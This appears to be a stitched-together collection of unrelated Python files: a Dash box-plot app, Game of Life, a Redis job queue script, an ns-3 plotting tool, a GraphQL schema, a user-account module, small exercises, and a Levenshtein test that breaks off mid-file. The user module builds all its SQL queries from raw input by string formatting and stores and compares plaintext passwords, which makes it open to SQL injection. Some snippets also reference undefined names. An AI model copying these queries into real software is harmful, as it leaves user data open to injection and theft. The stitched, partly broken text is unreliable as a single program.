# Update marker symbol when percentile selected
@app.callback(
    Output('marker-symbol', 'value'),
    [Input('select-percentile', 'value')]
)
def update_marker_symbol(percentile):
    """Show the marker symbol saved for the selected percentile."""
    slot_by_percentile = {'5%': 0, '10%': 1, '90%': 2}
    slot = slot_by_percentile.get(percentile, 3)
    return selected_marker_symbols[slot]
# Update Percentile Symbol Color Picker
@app.callback(
    Output('select-percentile-color', 'value'),
    [Input('select-percentile', 'value')]
)
def update_box_color_selector(percentile):
    """Load the saved rgba colour of the chosen percentile into the picker."""
    slot_by_percentile = {'5%': 0, '10%': 1, '90%': 2}
    rgba = percentile_color_saved[slot_by_percentile.get(percentile, 3)]
    # Stored as 'rgba(r, g, b, a)'; unpack into the colour picker's format.
    channels = rgba[rgba.find('(') + 1:-1].split(",")
    return dict(rgb=dict(r=channels[0], g=channels[1], b=channels[2], a=channels[3]))
# Turn Y Tick Disabled when in Logarithmic and Enabled when in Linear
# Turn Y Tick Value to None when in Logarithmic end recall previous value when turn back to Linear
@app.callback(
    [Output('delta-tick', 'disabled'),
     Output('delta-tick', 'value')],
    [Input('data-transform', 'value')]
)
def update_delta_tick_disabled(is_log):
    """Disable the tick-spacing input on log scale; restore it on linear."""
    restored = None if is_log else dtick_value
    return is_log, restored
# Box Color Selector Callback
@app.callback(
    Output('box-color', 'value'),
    [Input('select-box', 'value')]
)
def update_box_color_selector(box):
    """Load the saved colour of the chosen box into the colour picker."""
    saved = box_color_saved.get(box, dict(rgb=dict(r=222, g=110, b=75, a=default_alpha)))
    if not isinstance(saved, str):
        return saved
    # Saved as an 'rgba(r, g, b, a)' string; convert to the picker format.
    channels = saved[saved.find('(') + 1:-1].split(",")
    return dict(rgb=dict(r=channels[0], g=channels[1], b=channels[2], a=channels[3]))
# Box Selector Callback
@app.callback(
    Output('select-box', 'options'),
    [Input('select-groupby', 'value'), ]
)
def update_select_box(groupby):
    """Rebuild the box dropdown and reset each group's default colour."""
    groups = df[groupby].unique()
    for position, group in enumerate(groups):
        box_color_saved[group] = default_color[position % num_of_color]
    return [{'label': group, 'value': group} for group in groups]
# Threshold Line Callback
@app.callback(
    Output('treshold-value', 'value'),
    [Input('show-treshold', 'on'),
     Input('select-variable', 'value'),
     ]
)
def update_treshold_value(is_tresholdshow, variable):
    """Default the threshold to the variable's rounded mean when enabled."""
    if not is_tresholdshow:
        return ' '
    return np.around(np.mean(df[variable]), 0)
# Statistics Show Hide Callback
@app.callback(
    Output('show-stats', 'on'),
    [Input('select-outliers', 'value'), ]
)
def update_showstat(outliersshow):
    """Force the statistics toggle off when every data point is displayed."""
    if outliersshow == 'all':
        return False
    return None
# Figure Callback
@app.callback(
    Output('box-plot', 'figure'),
    [
        Input('select-variable', 'value'), Input('select-groupby', 'value'),
        Input('show-gridlines', 'on'),
        Input('show-zeroline-x', 'on'), Input('show-zeroline-y', 'on'),
        Input('show-legend', 'on'), Input('show-percentiles', 'on'),
        Input('graph-alignment', 'value'), Input('data-transform', 'value'),
        Input('select-outliers', 'value'), Input('show-ndata', 'on'),
        Input('show-percentiles', 'on'), Input('show-mean', 'on'),
        Input('show-sd', 'on'), Input('show-treshold', 'on'),
        Input('treshold-value', 'value'), Input('treshold-style', 'value'),
        Input('treshold-line-color', 'value'),
        Input('treshold-line-size', 'value'),
        Input('show-stats', 'on'), Input('graph-height', 'value'),
        Input('graph-width', 'value'),
        Input('select-box', 'value'), Input('box-color', 'value'),
        Input('grid-width', 'value'), Input('delta-tick', 'value'),
        Input('box-color-fill', 'value'),
        Input('select-percentile', 'value'), Input('marker-symbol', 'value'),
        Input('select-percentile-color', 'value'), Input('symbol-size', 'value'),
        Input('time-range-slider', 'value'),
    ]
)
def update_figure(
        variable, groupby,
        gridshow, xzeroline, yzeroline, legendshow,
        datapointsshow, is_vertical, is_log, outliersshow, is_ndatashow,
        is_percentileshow, is_meanshow, is_sdshow, is_tresholdshow, treshold_value,
        treshold_style, treshold_color, treshold_size, is_statshow, graph_height,
        graph_width, selected_box, box_color, grid_width, dtick, is_color_filled,
        select_percentile, marker_symbol, select_percentile_color, symbol_size,
        time_range=None):
    """Rebuild the box-plot figure from every control on the page.

    Fixed: the decorator declares 32 Inputs but the function only accepted
    31 arguments, so Dash raised a TypeError on every trigger; the trailing
    'time-range-slider' value is now accepted as ``time_range``.
    NOTE(review): 'show-percentiles' is listed twice in the Inputs (feeding
    both ``datapointsshow`` and ``is_percentileshow``), and ``time_range``
    is not yet used to filter ``df`` -- TODO confirm intended behaviour.
    """
    # Remember the last linear tick spacing so update_delta_tick_disabled
    # can restore it when switching back from log scale.  Fixed: this
    # previously assigned a dead local instead of the module-level value.
    global dtick_value
    if dtick is not None:
        dtick_value = dtick
    # Title and axis labels.
    xaxis_title = groupby
    yaxis_title = variable
    main_title = str(variable + " VS " + groupby)
    # Outliers selector: 'False' (hide points) arrives as a string from the UI.
    showpoints = False if outliersshow == 'False' else outliersshow
    # Initialising data and statistics accumulators (one entry per group).
    group_list = df[groupby].unique()
    data_list = []
    n_data = []
    data_mean = []
    data_median = []
    data_max = []
    data_min = []
    percentile_5 = []
    percentile_10 = []
    percentile_90 = []
    percentile_95 = []
    percentile_25 = []
    percentile_75 = []
    annots_ndata = []
    annots_mean = []
    annots_median = []
    annots_max = []
    annots_min = []
    annots_p5 = []
    annots_p10 = []
    annots_p25 = []
    annots_p75 = []
    annots_p90 = []
    annots_p95 = []
    annots_idx = 0
    # Vertical position (in data units) for the N-of-data annotations.
    max_n = df[variable].max()
    max_n = 1.05*np.log10(max_n) if is_log else 1.05*max_n
    picker_percentile_color = 'rgba({}, {}, {}, {})'.format(
        select_percentile_color['rgb']['r'],
        select_percentile_color['rgb']['g'],
        select_percentile_color['rgb']['b'],
        select_percentile_color['rgb']['a'],)
    picker_box_color = 'rgba({}, {}, {}, {})'.format(
        box_color['rgb']['r'],
        box_color['rgb']['g'],
        box_color['rgb']['b'],
        box_color['rgb']['a'],)
    color_idx = 0
    # Generate one box trace (and its annotations) per group.
    for i in group_list:
        if selected_box is not None:
            if i == selected_box:
                # Persist the picker colour for the currently selected box.
                box_color_saved[i] = picker_box_color
        color_idx += 1
        if (not is_vertical):
            data_list.append(
                go.Box(
                    y=df[df[groupby] == i][variable],
                    name=i,
                    boxpoints=showpoints,
                    boxmean='sd' if is_sdshow else None,
                    marker_color=box_color_saved[i],
                    fillcolor=box_color_saved[i] if is_color_filled else 'rgba(255,255,255,0)',
                )
            )
        else:
            data_list.append(
                go.Box(
                    x=df[df[groupby] == i][variable],
                    name=i,
                    orientation='h',
                    boxpoints=showpoints,
                    boxmean='sd' if is_sdshow else None,
                    marker_color=box_color_saved[i],
                    fillcolor=box_color_saved[i] if is_color_filled else 'rgba(255,255,255,0)',
                )
            )
        # Percentiles and extrema for this group, rounded for display.
        percentile_5.append(np.around(np.percentile((df[df[groupby] == i][variable]), 5), 2))
        percentile_10.append(np.around(np.percentile((df[df[groupby] == i][variable]), 10), 2))
        percentile_90.append(np.around(np.percentile((df[df[groupby] == i][variable]), 90), 2))
        percentile_95.append(np.around(np.percentile((df[df[groupby] == i][variable]), 95), 2))
        percentile_25.append(np.around(np.percentile((df[df[groupby] == i][variable]), 25), 2))
        percentile_75.append(np.around(np.percentile((df[df[groupby] == i][variable]), 75), 2))
        data_max.append(np.around(np.max((df[df[groupby] == i][variable])), 2))
        data_min.append(np.around(np.min((df[df[groupby] == i][variable])), 2))
        # Mean and median.
        data_mean.append(np.around(np.mean((df[df[groupby] == i][variable])), 2))
        data_median.append(np.around(np.median((df[df[groupby] == i][variable])), 2))
        # Number of rows in this group.
        df_shape = df[df[groupby] == i][variable].shape
        n_data.append(df_shape[0])
        # Annotation: number of data points.
        annots_ndata.append(go.layout.Annotation(
            x=max_n if is_vertical else annots_idx,
            y=annots_idx if is_vertical else max_n,
            xref='x',
            yref='y',
            text='N = {}'.format(n_data[annots_idx]),
            showarrow=False,
            ax=0 if is_vertical else annots_idx,
            ay=annots_idx if is_vertical else 0,
            )
        )
        # Annotation: mean.
        annots_mean.append(go.layout.Annotation(
            x=(np.log10(data_mean[annots_idx]) if is_log else data_mean[annots_idx]) if is_vertical else annots_idx,
            y=annots_idx if is_vertical else (np.log10(data_mean[annots_idx]) if is_log else data_mean[annots_idx]),
            xref='x',
            yref='y',
            text='Mean: {}'.format(data_mean[annots_idx]),
            showarrow=True,
            ax=0 if is_vertical else (100/len(group_list))*5,
            ay=(100/len(group_list))*2 if is_vertical else 0,
            arrowhead=7,
        ))
        # Annotation: median.
        annots_median.append(go.layout.Annotation(
            x=(np.log10(data_median[annots_idx]) if is_log else data_median[annots_idx]) if is_vertical else annots_idx,
            y=annots_idx if is_vertical else (np.log10(data_median[annots_idx]) if is_log else data_median[annots_idx]),
            xref='x',
            yref='y',
            text='Med: {}'.format(data_median[annots_idx]),
            showarrow=True,
            ax=0 if is_vertical else (-100/len(group_list))*4,
            ay=(-100/len(group_list))*2 if is_vertical else 0,
            arrowhead=7,
        ))
        # Annotation: 5th percentile.
        annots_p5.append(go.layout.Annotation(
            x=(np.log10(percentile_5[annots_idx]) if is_log else percentile_5[annots_idx]) if is_vertical else annots_idx,
            y=annots_idx if is_vertical else (np.log10(percentile_5[annots_idx]) if is_log else percentile_5[annots_idx]),
            xref='x',
            yref='y',
            text='P5: {}'.format(percentile_5[annots_idx]),
            showarrow=True,
            ax=0 if is_vertical else (-100/len(group_list))*4,
            ay=(-100/len(group_list))*2 if is_vertical else 0,
            arrowhead=7,
        ))
        # Annotation: 10th percentile.
        annots_p10.append(go.layout.Annotation(
            x=(np.log10(percentile_10[annots_idx]) if is_log else percentile_10[annots_idx]) if is_vertical else annots_idx,
            y=annots_idx if is_vertical else (np.log10(percentile_10[annots_idx]) if is_log else percentile_10[annots_idx]),
            xref='x',
            yref='y',
            text='P10: {}'.format(percentile_10[annots_idx]),
            showarrow=True,
            ax=0 if is_vertical else (100/len(group_list))*5,
            ay=(100/len(group_list))*2 if is_vertical else 0,
            arrowhead=7,
        ))
        # Annotation: 25th percentile (Q1).
        annots_p25.append(go.layout.Annotation(
            x=(np.log10(percentile_25[annots_idx]) if is_log else percentile_25[annots_idx]) if is_vertical else annots_idx,
            y=annots_idx if is_vertical else (np.log10(percentile_25[annots_idx]) if is_log else percentile_25[annots_idx]),
            xref='x',
            yref='y',
            text='Q1: {}'.format(np.around(percentile_25[annots_idx], 2)),
            showarrow=True,
            ax=0 if is_vertical else (-100/len(group_list))*4,
            ay=(-100/len(group_list))*2 if is_vertical else 0,
            arrowhead=7,
        ))
        # Annotation: 75th percentile (Q3).
        annots_p75.append(go.layout.Annotation(
            x=(np.log10(percentile_75[annots_idx]) if is_log else percentile_75[annots_idx]) if is_vertical else annots_idx,
            y=annots_idx if is_vertical else (np.log10(percentile_75[annots_idx]) if is_log else percentile_75[annots_idx]),
            xref='x',
            yref='y',
            text='Q3: {}'.format(np.around(percentile_75[annots_idx], 2)),
            showarrow=True,
            ax=0 if is_vertical else (100/len(group_list))*5,
            ay=(100/len(group_list))*2 if is_vertical else 0,
            arrowhead=7,
        ))
        # Annotation: 90th percentile.
        annots_p90.append(go.layout.Annotation(
            x=(np.log10(percentile_90[annots_idx]) if is_log else percentile_90[annots_idx]) if is_vertical else annots_idx,
            y=annots_idx if is_vertical else (np.log10(percentile_90[annots_idx]) if is_log else percentile_90[annots_idx]),
            xref='x',
            yref='y',
            text='P90: {}'.format(percentile_90[annots_idx]),
            showarrow=True,
            ax=0 if is_vertical else (-100/len(group_list))*4,
            ay=(-100/len(group_list))*2 if is_vertical else 0,
            arrowhead=7,
        ))
        # Annotation: 95th percentile.
        annots_p95.append(go.layout.Annotation(
            x=(np.log10(percentile_95[annots_idx]) if is_log else percentile_95[annots_idx]) if is_vertical else annots_idx,
            y=annots_idx if is_vertical else (np.log10(percentile_95[annots_idx]) if is_log else percentile_95[annots_idx]),
            xref='x',
            yref='y',
            text='P95: {}'.format(percentile_95[annots_idx]),
            showarrow=True,
            ax=0 if is_vertical else (100/len(group_list))*5,
            ay=(100/len(group_list))*2 if is_vertical else 0,
            arrowhead=7,
        ))
        # Annotation: maximum.
        annots_max.append(go.layout.Annotation(
            x=(np.log10(data_max[annots_idx]) if is_log else data_max[annots_idx]) if is_vertical else annots_idx,
            y=annots_idx if is_vertical else (np.log10(data_max[annots_idx]) if is_log else data_max[annots_idx]),
            xref='x',
            yref='y',
            text='Max: {}'.format(data_max[annots_idx]),
            showarrow=True,
            ax=0 if is_vertical else (-100/len(group_list))*4,
            ay=(-100/len(group_list))*2 if is_vertical else 0,
            arrowhead=7,
        ))
        # Annotation: minimum.
        annots_min.append(go.layout.Annotation(
            x=(np.log10(data_min[annots_idx]) if is_log else data_min[annots_idx]) if is_vertical else annots_idx,
            y=annots_idx if is_vertical else (np.log10(data_min[annots_idx]) if is_log else data_min[annots_idx]),
            xref='x',
            yref='y',
            text='Min: {}'.format(data_min[annots_idx]),
            showarrow=True,
            ax=0 if is_vertical else (100/len(group_list))*5,
            ay=(100/len(group_list))*2 if is_vertical else 0,
            arrowhead=7,
        ))
        annots_idx = annots_idx + 1
    # Drop annotation groups that the toggles have disabled.
    if (not is_ndatashow):
        annots_ndata = []
    if (not is_statshow):
        annots_mean = []
        annots_median = []
        annots_p5 = []
        annots_p10 = []
        annots_p25 = []
        annots_p90 = []
        annots_p75 = []
        annots_p95 = []
        annots_max = []
        annots_min = []
    annots_ndata = annots_ndata + annots_mean + annots_median + annots_p5 + annots_p10 + annots_p25 + annots_p75 + annots_p90 + annots_p95 + annots_max + annots_min
    # Persist the symbol/colour chosen for the selected percentile.
    ip = 0
    if select_percentile == '5%':
        ip = 0
    elif select_percentile == '10%':
        ip = 1
    elif select_percentile == '90%':
        ip = 2
    else:
        ip = 3
    selected_marker_symbols[ip] = marker_symbol
    percentile_color_saved[ip] = picker_percentile_color
    # Orientation: swap axis titles and attach log type to the value axis.
    type_x = None
    type_y = None
    if (is_vertical):
        xaxis_title, yaxis_title = yaxis_title, xaxis_title
        type_x = 'log' if is_log else None
        if(is_meanshow):
            data_list.append(go.Scatter(x=data_mean, y=group_list, mode='markers', name='Mean', marker=dict(symbol=selected_marker_symbols[4], size=symbol_size)))
        # Percentile marker traces (horizontal orientation).
        if (is_percentileshow):
            data_list.append(go.Scatter(y=group_list, x=percentile_5, mode='markers', name='5%', marker_color=percentile_color_saved[0], marker=dict(symbol=selected_marker_symbols[0], size=symbol_size)))
            data_list.append(go.Scatter(y=group_list, x=percentile_10, mode='markers', name='10%', marker_color=percentile_color_saved[1], marker=dict(symbol=selected_marker_symbols[1], size=symbol_size)))
            data_list.append(go.Scatter(y=group_list, x=percentile_90, mode='markers', name='90%', marker_color=percentile_color_saved[2], marker=dict(symbol=selected_marker_symbols[2], size=symbol_size)))
            data_list.append(go.Scatter(y=group_list, x=percentile_95, mode='markers', name='95%', marker_color=percentile_color_saved[3], marker=dict(symbol=selected_marker_symbols[3], size=symbol_size)))
    else:
        type_y = 'log' if is_log else None
        if(is_meanshow):
            data_list.append(go.Scatter(x=group_list, y=data_mean, mode='markers', name='Mean', marker=dict(symbol=selected_marker_symbols[4], size=symbol_size)))
        # Percentile marker traces (vertical orientation).
        if (is_percentileshow):
            data_list.append(go.Scatter(x=group_list, y=percentile_5, mode='markers', name='5%', marker_color=percentile_color_saved[0], marker=dict(symbol=selected_marker_symbols[0], size=symbol_size)))
            data_list.append(go.Scatter(x=group_list, y=percentile_10, mode='markers', name='10%', marker_color=percentile_color_saved[1], marker=dict(symbol=selected_marker_symbols[1], size=symbol_size)))
            data_list.append(go.Scatter(x=group_list, y=percentile_90, mode='markers', name='90%', marker_color=percentile_color_saved[2], marker=dict(symbol=selected_marker_symbols[2], size=symbol_size)))
            data_list.append(go.Scatter(x=group_list, y=percentile_95, mode='markers', name='95%', marker_color=percentile_color_saved[3], marker=dict(symbol=selected_marker_symbols[3], size=symbol_size)))
    # Optional horizontal/vertical threshold line across all groups.
    treshold_shape = []
    if is_tresholdshow:
        treshold_shape.append(dict(line=dict(
            color='rgba({}, {}, {}, {})'.format(
                treshold_color['rgb']['r'],
                treshold_color['rgb']['g'],
                treshold_color['rgb']['b'],
                treshold_color['rgb']['a'], ),
            width=treshold_size, dash=treshold_style,
            ),
            type='line',
            x0=-0.5 if not is_vertical else treshold_value,
            x1=len(group_list)-0.5 if not is_vertical else treshold_value,
            y0=treshold_value if not is_vertical else -0.5,
            y1=treshold_value if not is_vertical else len(group_list)-0.5,
        ))
    # Assemble the figure.
    return{
        'data': data_list,
        'layout': go.Layout(
            xaxis=go.layout.XAxis(
                title=xaxis_title,
                showgrid=gridshow,
                zeroline=xzeroline,
                type=type_x,
                gridwidth=grid_width,
                gridcolor='lightgrey',
                dtick=dtick if is_vertical else None,
            ),
            yaxis=go.layout.YAxis(
                title=yaxis_title,
                showgrid=gridshow,
                zeroline=yzeroline,
                type=type_y,
                gridwidth=grid_width,
                gridcolor='lightgrey',
                dtick=None if is_vertical else dtick,
            ),
            title=main_title,
            showlegend=legendshow,
            height=graph_height,
            width=graph_width,
            annotations=annots_ndata,
            shapes=treshold_shape,
        )
    }
if __name__ == '__main__':
    # Dash development server; debug=True enables hot reload -- disable in production.
    app.run_server(debug=True)
|
# Simple comparison-operator demo (output labels are in Turkish).
a = 10 > 5
b = 10 < 5
print("a :", a)
print("b :", b)
print("10 5 ten küçük mü ? :", 10 < 5)   # "is 10 less than 5?"
print("10 5 ten büyük mü ? :", 10 > 5)   # "is 10 greater than 5?"
|
import pathlib
import random
import copy
from typing import List, Optional, Tuple
Cell = Tuple[int, int]   # (row, col) coordinates of a single cell
Cells = List[int]        # flat list of cell states (0 = dead, 1 = alive)
Grid = List[Cells]       # rectangular field of cell states


class GameOfLife:
    """Conway's Game of Life on a bounded (non-wrapping) grid."""

    def __init__(
        self,
        size: Tuple[int, int],
        randomize: bool = True,
        max_generations: Optional[float] = float('inf')
    ) -> None:
        # Field dimensions.
        self.rows, self.cols = size
        # Previous generation of cells.
        self.prev_generation = self.create_grid()
        # Current generation of cells.
        self.curr_generation = self.create_grid(randomize=randomize)
        # Maximum number of generations allowed.
        self.max_generations = max_generations
        # Number of generations elapsed so far.
        self.generations = 1

    def create_grid(self, randomize: bool = False) -> Grid:
        """Build a rows x cols grid, optionally filled with random 0/1."""
        if randomize:
            return [[random.randint(0, 1) for _ in range(self.cols)]
                    for _ in range(self.rows)]
        return [[0] * self.cols for _ in range(self.rows)]

    def get_neighbours(self, cell: Cell) -> Cells:
        """Return the states of the up-to-8 in-bounds neighbours of *cell*."""
        row, col = cell
        neighbours = []
        for dr in range(-1, 2):
            for dc in range(-1, 2):
                if (dr, dc) == (0, 0):
                    continue
                if 0 <= row + dr < self.rows and 0 <= col + dc < self.cols:
                    neighbours.append(self.curr_generation[row + dr][col + dc])
        return neighbours

    def get_next_generation(self) -> Grid:
        """Apply the B3/S23 rules and return the next generation grid."""
        new_grid = copy.deepcopy(self.curr_generation)
        for i in range(self.rows):
            for j in range(self.cols):
                alive = sum(1 for state in self.get_neighbours((i, j)) if state)
                if new_grid[i][j]:
                    # A live cell survives only with 2 or 3 live neighbours.
                    if not 2 <= alive <= 3:
                        new_grid[i][j] = 0
                elif alive == 3:
                    # A dead cell with exactly 3 live neighbours becomes alive.
                    new_grid[i][j] = 1
        return new_grid

    def step(self) -> None:
        """Advance the game by one generation."""
        self.prev_generation = copy.deepcopy(self.curr_generation)
        self.curr_generation = self.get_next_generation()
        self.generations += 1

    @property
    def is_max_generations_exceeded(self) -> bool:
        """Whether the generation count has exceeded the allowed maximum."""
        return self.generations > self.max_generations

    @property
    def is_changing(self) -> bool:
        """Whether the board changed since the previous step."""
        return not self.curr_generation == self.prev_generation

    @staticmethod
    def from_file(filename: pathlib.Path) -> 'GameOfLife':
        """Read an initial state from *filename* (rows of 0/1 characters).

        Fixed: the file handle is now closed via a context manager, and an
        empty file no longer raises NameError for the undefined width.
        """
        grid: Grid = []
        with open(filename) as f:
            for line in f:
                grid.append([int(ch) for ch in line if ch in '01'])
        height = len(grid)
        width = len(grid[0]) if grid else 0
        game = GameOfLife((height, width), False)
        game.prev_generation = game.create_grid()
        game.curr_generation = grid
        return game

    def save(self, filename: pathlib.Path) -> None:
        """Write the current state to *filename*, one row of 0/1 per line."""
        with open(filename, 'w') as f:   # fixed: file handle was never closed on error
            for i in range(self.rows):
                for j in range(self.cols):
                    f.write(str(self.curr_generation[i][j]))
                f.write('\n')
if __name__ == '__main__':
    # Fixed: GameOfLife() was called without its required `size` argument and
    # has no run() method, so this demo crashed; step until the field
    # stabilises or the generation cap is reached instead.
    game = GameOfLife((10, 10), max_generations=100)
    while game.is_changing and not game.is_max_generations_exceeded:
        game.step()
# Enqueue ten copies of count_words_at_url on an RQ queue backed by the
# local Redis instance, wait for the workers, then print the results.
from redis import Redis
from rq import Queue
import time
q = Queue(connection=Redis())
from my_module import count_words_at_url
result = []
for i in range(10):
    result.append(q.enqueue(count_words_at_url, 'http://nvie.com'))
# NOTE(review): a fixed sleep is a race -- any job slower than 6 s prints
# None below; polling job.is_finished would be reliable.  TODO confirm.
time.sleep(6)
for r in result:
    print(r.result)
|
#!/usr/bin/python2
#coding=utf-8
#Invocation:
# ./drawSingleTransmission.py numTransmissionToPlot
# OR
# ./drawSingleTransmission.py path.csv numTransmissionToPlot
# example: ./drawSingleTransmission.py /home/jordan/MEGA/Universita_mia/Magistrale/Tesi/ns3-cluster/ns-3.26/out/scenario-urbano-con-coord/cw-32-1024/Padova/d25/b0/st500-500/Padova-25-cw-32-1024-b0-st500-500-1550077028283.csv 10
import os
import sys
import getopt
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import csv
import xml.etree.ElementTree as ET
import coordUtils as coordUtils
# Input maps -- hard-coded to the Padova d25 scenario.
ns2MobilityFile = "../../maps/Padova/Padova-25.ns2mobility.xml"
polyFilePath = "../../maps/Padova/Padova-25.poly.xml"
# Square figure so the transmission circle is not distorted.
plt.rcParams["figure.figsize"] = [10, 10]
# Radius (map units) of the transmission-range circle drawn around the source.
circRadius = 1000
baseFolder = "../../ns-3.26/out/scenario-urbano-con-coord/cw-32-1024/Padova/d25/"
def plotSingleTransmission(relativeFileName, outFileBasePath, numTransmissionToPlot=None):
    """Plot the hop-by-hop propagation of one transmission, one PDF per step.

    relativeFileName: CSV produced by the ns-3 simulation.
    outFileBasePath: path prefix for the '-transmission<i>.pdf' output files.
    numTransmissionToPlot: number of steps to draw (default: all of them).
    """
    import errno  # fixed: errno was used in the makedirs guard but never imported
    print("Plotting single transmission " + relativeFileName)
    startingVehicle = 0
    vehicleDistance = 0
    txRange = 0
    xReceivedCoords = []
    yReceivedCoords = []
    xNodeCoords = []
    yNodeCoords = []
    startingX = 0
    startingY = 0
    transmissionMap = {}
    receivedCoordsOnCirc = []
    receivedOnCircIds = []
    transmissionVector = []
    txRange, startingX, startingY, startingVehicle, vehicleDistance, xReceivedCoords, yReceivedCoords, xNodeCoords, yNodeCoords, transmissionMap, receivedCoordsOnCirc, receivedOnCircIds, transmissionVector = coordUtils.parseFile(relativeFileName, ns2MobilityFile)
    # Cache node coordinates: findCoordsFromFile parses the mobility file on
    # every call, so look each node up at most once.
    nodeCoordsMap = {}
    color1 = "#840000"
    if (numTransmissionToPlot is None):
        numTransmissionToPlot = len(transmissionVector) - 1
    for i in range(1, numTransmissionToPlot + 1):
        plt.plot(xNodeCoords, yNodeCoords, ".", color="red")
        coordUtils.plotTxRange(circRadius, startingX, startingY, vehicleDistance, color1, True)
        count = 0
        print(i)
        for edge in transmissionVector:
            if (count >= i):
                break
            count += 1
            # Older hops are light grey; the most recent hop is darker.
            lineColor = "0.8"
            if (count == i - 1):
                lineColor = "0.35"
            source = edge.source
            destination = edge.destination
            if (not source in nodeCoordsMap):
                nodeCoordsMap[source] = coordUtils.findCoordsFromFile(edge.source, ns2MobilityFile)
            if (not destination in nodeCoordsMap):
                nodeCoordsMap[destination] = coordUtils.findCoordsFromFile(edge.destination, ns2MobilityFile)
            sourceCoord = nodeCoordsMap[source]
            destCoord = nodeCoordsMap[destination]
            plt.plot(sourceCoord.x, sourceCoord.y, "ro", color="#af41f4", markersize=5)
            plt.plot([sourceCoord.x, destCoord.x], [sourceCoord.y, destCoord.y], color=lineColor, linewidth=0.3, alpha=0.7)
            plt.plot(destCoord.x, destCoord.y, ".", color="green", markersize=5)
        plt.plot(startingX, startingY, "ro", color="blue", markersize=5)
        coordUtils.plotTxRange(circRadius, startingX, startingY, vehicleDistance, color1, True)
        #coordUtils.plotBuildings(polyFilePath)
        # Save file, creating the output directory on first use.
        if not os.path.exists(os.path.dirname(outFileBasePath)):
            try:
                os.makedirs(os.path.dirname(outFileBasePath))
            except OSError as exc:  # Guard against race condition
                if exc.errno != errno.EEXIST:
                    raise
        plt.savefig(outFileBasePath + "-transmission" + str(i) + ".pdf")
        plt.clf()
def main():
    """CLI entry point: drawSingleTransmission.py <csv path> [numTransmissionToPlot]."""
    print("Draw single transmissions")
    csv_path = sys.argv[1]
    how_many = int(sys.argv[2]) if len(sys.argv) > 2 else None
    plotSingleTransmission(csv_path, "./out/singlefileSingleTransmission/singleTransmission", how_many)


if __name__ == "__main__":
    main()
|
import strawberry
from fruit.mutation import FruitMutations
from fruit.query import FruitQueries
from garden.query import GardenQueries
# Queries from each domain module are merged into the root type via inheritance.
@strawberry.type(description='Root query to house all other queries.')
class RootQuery(FruitQueries, GardenQueries):
    """ Root GraphQL query. """
# Mutations from each domain module are merged into the root type via inheritance.
@strawberry.type(description='Root mutation to house all other mutations.')
class RootMutation(FruitMutations):
    """ Root GraphQL mutation. """
# The executable schema served by the GraphQL endpoint.
schema = strawberry.Schema(query=RootQuery, mutation=RootMutation)
|
#!/usr/bin/env python
#coding: utf-8
import json
from models import execute_sql
from models import select_all_result
from models import select_one_result
# Path of the (currently unused) remember-me store; see commented code below.
rememberme='./rememberme'
#def rememberMe(saveuser):
# users = []
# users.append(saveuser)
# with open(rememberme, 'w') as fd:
# fd.write(json.dumps(users))
#
#
#def getRememberMe():
# try:
# with open(rememberme,'r') as fd:
# users = json.loads(fd.read())
# except Exception as e:
# users= []
# return users
def register(data):
    # Insert a new user row from a dict with 'username', 'email', 'password'.
    # NOTE(review): SQL built with % interpolation is vulnerable to SQL
    # injection; use a parameterised query if execute_sql supports one.
    sql = '''INSERT INTO users(username, email, password) values('%s', '%s', '%s')''' % (data['username'], data['email'], data['password'])
    print sql
    return execute_sql(sql)
def get_users():
    # Fetch every user row.
    sql = '''SELECT * FROM users '''
    return select_all_result(sql)
def login_check(name,password):
    # Return the user row matching both username and password, if any.
    # NOTE(review): %-interpolated SQL is injectable, and passwords appear
    # to be compared in plain text -- hash them and parameterise the query.
    sql = '''SELECT * FROM users WHERE username = '%s' and password = '%s';''' % (name,password)
    print sql
    return select_one_result(sql)
def get_user(name):
    # Look a user up by username.  NOTE(review): injectable %-built SQL.
    sql = '''SELECT * FROM users WHERE username = '%s';''' % name
    return select_one_result(sql)
def get_email(email):
    # Look a user up by e-mail address.  NOTE(review): injectable %-built SQL.
    sql = '''SELECT * FROM users WHERE email = '%s';''' % email
    return select_one_result(sql)
def get_user_id(uid):
    # Look a user up by numeric id.  NOTE(review): injectable %-built SQL.
    sql = '''SELECT * FROM users WHERE id = '%d';''' % uid
    return select_one_result(sql)
def userDel(uid):
    # Delete the user with the given id.  NOTE(review): injectable %-built SQL.
    sql = '''DELETE FROM users WHERE id = %s; ''' % uid
    print sql
    return execute_sql(sql)
def userUpdate(data):
    # Overwrite username/password/email for the row identified by data['id'].
    # NOTE(review): injectable %-built SQL -- parameterise if possible.
    sql = '''UPDATE users set username='%s',password='%s',email='%s' WHERE id = %d;''' % (data['username'],data['password'],data['email'],data['id'])
    print 'update:' + sql
    return execute_sql(sql)
def cleanup():
    # NOTE(review): close_db is not imported anywhere in this module, so
    # calling this raises NameError -- presumably it should come from
    # models; TODO confirm and import it.
    close_db()
if __name__ == '__main__':
    print "__name__", __name__
    # NOTE(review): ssum is undefined in this module -- running this file
    # directly raises NameError; looks like leftover demo code.
    s = ssum(3, 2)
    print "common ssum: ", s
|
import os
import configparser
class ConfigReader:
    """Thin wrapper around configparser for reading application settings."""

    _SECTION = "BasicConfig"

    def __init__(self, path):
        """Parse the INI file at *path* (silently empty if it is missing)."""
        parser = configparser.ConfigParser()
        parser.read(path)
        self.cf = parser

    def getDataSourceType(self):
        """Return the 'dataSourceType' option from the BasicConfig section."""
        return self.cf.get(self._SECTION, "dataSourceType")
|
# Guess-the-number game.
# Note to self: avoid nesting if inside if; use if or while appropriately.
import random
# import math
num = random.randint(1, 10)
# Refactored into a for loop (at most 9 guesses).
for i in range(1, 10):
    guess = int(input('请输入1-10的数字:\n'))
    if guess != num:
        # i increments by itself inside the for loop
        #i = i + 1
        if guess > num:
            print("Lower please")
        else:
            print("Greater please")
    else:
        if i == 1:
            print("You got it at the first time!!!")
        else:
            # Note: use Python's built-in str.format method
            print("You got it in {} times".format(i))
|
import base as bs
import modified as md
import base_with_rec as rec
from itertools import combinations
import time
def result_test():
    """Print pairwise Levenshtein distances between Russian month names as
    computed by the three implementations (base, recursive, modified)."""
    months = ["Январь",
              "Февраль",
              "Март",
              "Апрель",
              "Май",
              "Июнь",
              "Июль",
              "Август",
              "Сентябрь",
              "Октябрь",
              "Ноябрь",
              "Декабрь"]
    print("Расстояние Левенштейна между строками:\n")
    for left, right in combinations(months, 2):
        base_d = bs.distance(left, right)
        rec_d = rec.distance(left, right)
        mod_d = md.distance(left, right)
        print(left, " - ", right, ": ", base_d, " ", rec_d, " ", mod_d)
def time_test():
    """Benchmark the three implementations on progressively more different
    strings, printing cumulative average times in milliseconds."""
